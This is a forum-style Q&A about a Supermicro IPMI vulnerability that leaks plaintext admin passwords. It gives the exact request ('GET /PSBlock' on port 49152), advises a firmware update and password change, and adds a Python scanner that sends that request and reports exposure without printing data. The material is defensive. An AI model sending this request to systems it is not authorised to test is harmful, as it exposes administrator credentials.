I have some Supermicro servers with IPMI running, and as described in this blog (http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras), there's a critical vulnerability that allows getting plaintext admin passwords from any remote location.
How can I check if my server motherboard is compromised?
Simply telnet to the IPMI IP address on port 49152 and do a specific GET request. You should get your users and passwords if you're compromised.
After connecting, ask for
GET /PSBlock
and watch the results; it should be something like this:

Answer:
To solve this issue, update the IPMI firmware to the latest version. The firmware is specific to your IPMI controller, so you should get the one specified on the Supermicro website.
Then, after updating the firmware, change your passwords.
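
The check described above can be run across your own BMC addresses before and after the firmware update. The following is an added example, not part of the original post: it sends the request from the post to port 49152 and reports only a state and a byte count, never the returned data. The function names, state labels, read cap and the handling of an HTTP status line are assumptions made for this example.

```python
import socket
import sys

PORT = 49152                       # port given in the post
REQUEST = b"GET /PSBlock\r\n\r\n"  # request given in the post
MAX_BYTES = 65536                  # read cap (assumption)


def classify(raw):
    """Map raw bytes read from the port to (state, body_size); the body is never returned."""
    if raw is None:
        return ("unreachable", 0)
    body = raw
    if raw.startswith(b"HTTP/"):   # assumption: reply may carry an HTTP status line
        head, _, body = raw.partition(b"\r\n\r\n")
        fields = head.split(b"\r\n", 1)[0].split()
        if len(fields) < 2 or fields[1] != b"200":
            return ("not-served", 0)
    if body.strip():
        return ("exposed", len(body))
    return ("empty", 0)


def probe(host, port=PORT, timeout=5.0):
    """Send the request to one BMC; return the bytes read, or None if nothing was read."""
    buf = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(REQUEST)
            while len(buf) < MAX_BYTES:
                data = s.recv(4096)
                if not data:
                    break
                buf += data
    except OSError:                # refused, timed out, unreachable, reset
        pass
    return buf or None


def audit(hosts):
    """Check each of your own BMC addresses and report state only."""
    return {h: classify(probe(h)) for h in hosts}


if __name__ == "__main__":
    for host, (state, size) in audit(sys.argv[1:]).items():
        print(f"{host}: {state} ({size} bytes returned)")
```

Pass your BMC addresses as arguments. Any host reported as exposed needs the firmware update and password change described above; run the check again afterwards to confirm the state has changed.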